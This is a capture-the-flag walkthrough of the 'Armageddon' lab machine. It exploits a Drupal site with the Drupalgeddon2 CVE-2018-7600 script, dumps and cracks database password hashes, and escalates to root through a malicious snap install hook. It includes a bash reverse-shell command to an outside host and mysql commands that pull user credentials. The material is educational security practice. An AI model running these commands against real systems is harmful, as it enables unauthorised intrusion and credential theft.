# ARMAGEDDON | 10.10.10.233

## Enumeration

    sudo nmap -v -T4 -sCV -oN nmap-initial 10.10.10.233

### Ports and Services

![nmap top 1000 ports](img/nmap-initial.png)

#### 22 - SSH - OpenSSH 7.4

If and when I get credentials I will come back here. The real stuff is on port 80.

#### 80 - HTTP - Apache https 2.4.6 CentOS

![homepage](img/homepage.png)

It is a generic blog with no content, called Armageddon. The nmap scan hinted what the CMS is behind this, and I have confirmed by looking at the source:

![homepage source](img/source-drupal.png)

Running 'droopescan' also confirms the version of drupal running, linking to the CHANGELOG.txt file that is accessible:

![droopescan results](img/droopescan.png)

Checking searchsploit for potential vulns for this version picks up quite a few options:

![searchsploit drupal 7.56](img/ss-drupal.png)

## Exploitation via CVE-2018-7600

Yes, versions below 7.58 are infamous for having an RCE that has been endlessly documented. Drupalgeddon3 requires credentials. And I have tried using the one labeled 'Drupalgeddon2' and had no luck in the past. Luckily I save all the exploits I use so I have a nicely-written, python 3 version of the Drupalgeddon2 exploit, based on the Metasploit version.

![excerpt of Drupalgeddon2 code](img/drupalgeddon2.png)

### Exploit Method

This exploit poisons the recover password form in Drupal and triggers the RCE with an upload file via Ajax. The default command it runs is 'id', so I will test it with that.

```bash
python3 drupalgeddon2.py http://10.10.10.233
```

![POC of exploit - basic code execution](img/POC.png)

OK it works. I also used it to see if the box had netcat, which it did not appear to, so I will attempt a simple bash tcp reverse shell.

```bash
python3 drupalgeddon2.py http://10.10.10.233 -c "bash -i >& /dev/tcp/10.10.14.26/443 0>&1"
```
![low-priv shell](img/shell.png)

## Privilege Escalation - apache > brucetherealadmin

I'm guessing I'll have to make a lateral move here; with this access I can't even look at the `/home/` directory.

### Enumeration

I can poke around the `/var/www/html` directory however, as I have access to that. Eventually I find the 'settings.php' file which contains credentials to the DB that I assume is running on the server:

![DB creds](img/db-creds.png)

From here I can enumerate the mysql server to see if I can grab even more credentials. This shell is not playing nice so I can only run mysql commands rather than actually connect and hangout in the server with a mysql prompt, but I can still make progress.

I already know there is a 'drupal' database, so I can try to enumerate the available tables:

```bash
mysql -u drupaluser -D drupal -e 'show tables;' -p
```

![tables](img/tables.png)

Lotsa tables, but I am really only interested in the 'users' one.

```bash
mysql -u drupaluser -D drupal -e 'select mail,pass from users;' -p
```

![admin hash](img/admin-hash.png)

It took just a second to crack it in john with the rockyou wordlist:

![cracked hash](img/admin-pass.png)

And with this password I was able to log in as 'brucetherealadmin' (enumerated via `cat /etc/passwd`) via SSH:

![SSH as bruce](img/bruce-shell.png)

#### user Flag

![bruce flag](img/bruce-flag.png)

## Privilege Escalation - bruce > root

### Enumeration

Linpeas kind of lit up a couple of things like an Xmas tree, so we have some strong contenders for PE here.

Firstly the user's PATH is different from typical - their /home directory is appended at the end:

![PATH export](img/lin-path.png)

Worse than that, this user is allowed to run snap as root to install any snap package:

![sudo -l](img/lin-sudo-l.png)

### Exploit method

So if I go check out [gtfobins](https://gtfobins.github.io/gtfobins/snap/) it appears I can create a malicious snap package and then run install it as root.

![GTFObins snap](img/gtfo-snap.png)

Getting the environment correct so that I could even use fpm to create a package was a pain, and then running the install command with sudo didn't actually work for me, so I had to figure it out on my own.

Basically I made the install hook (the part in GTFO about `/bin/sh; false $COMMAND` do something differently. I changed /bin/sh to /bin/bash and then simply made the command a copy of bash to /tmp and a chmod +s to make it SUID.

This did not work. The snap appeared to install but it failed to execute the hook; maybe there is something that I am missing. So I resorted to adding a new user with sudo permissions:

![snap install hook - attempt 2](img/snap-hook.png)

OK, that worked!

![cat /etc/passwd](img/cat-etc-passwd.png)

Now, time to escalate:

![root shell](img/root-shell.png)

#### root Flag

![root flag](img/root-flag.png)

## Conclusion

A pretty easy box with vulnerabilities that I have seen before, but still nice to get a refresher. I guess one intersting thing is that the GTFObins method for privesc did not work really - I had to modify the exploit and I got that mod from another snap-based exploit called 'dirty_sock'. It is strange to me that the install hook could add a new user and give it sudo rights, but couldn't simply copy a binary and give it the SUID bit.

**Steps taken:**

* Enumerate Drupal blog and use Drupalgeddon2 CVE exploit to get reverse shell
* Move laterally by enumerating mysql DB, crack hash and login as user
* Escalate to root via permissive sudo privileges, allowing to run malicious snap install hook to add new sudo user.
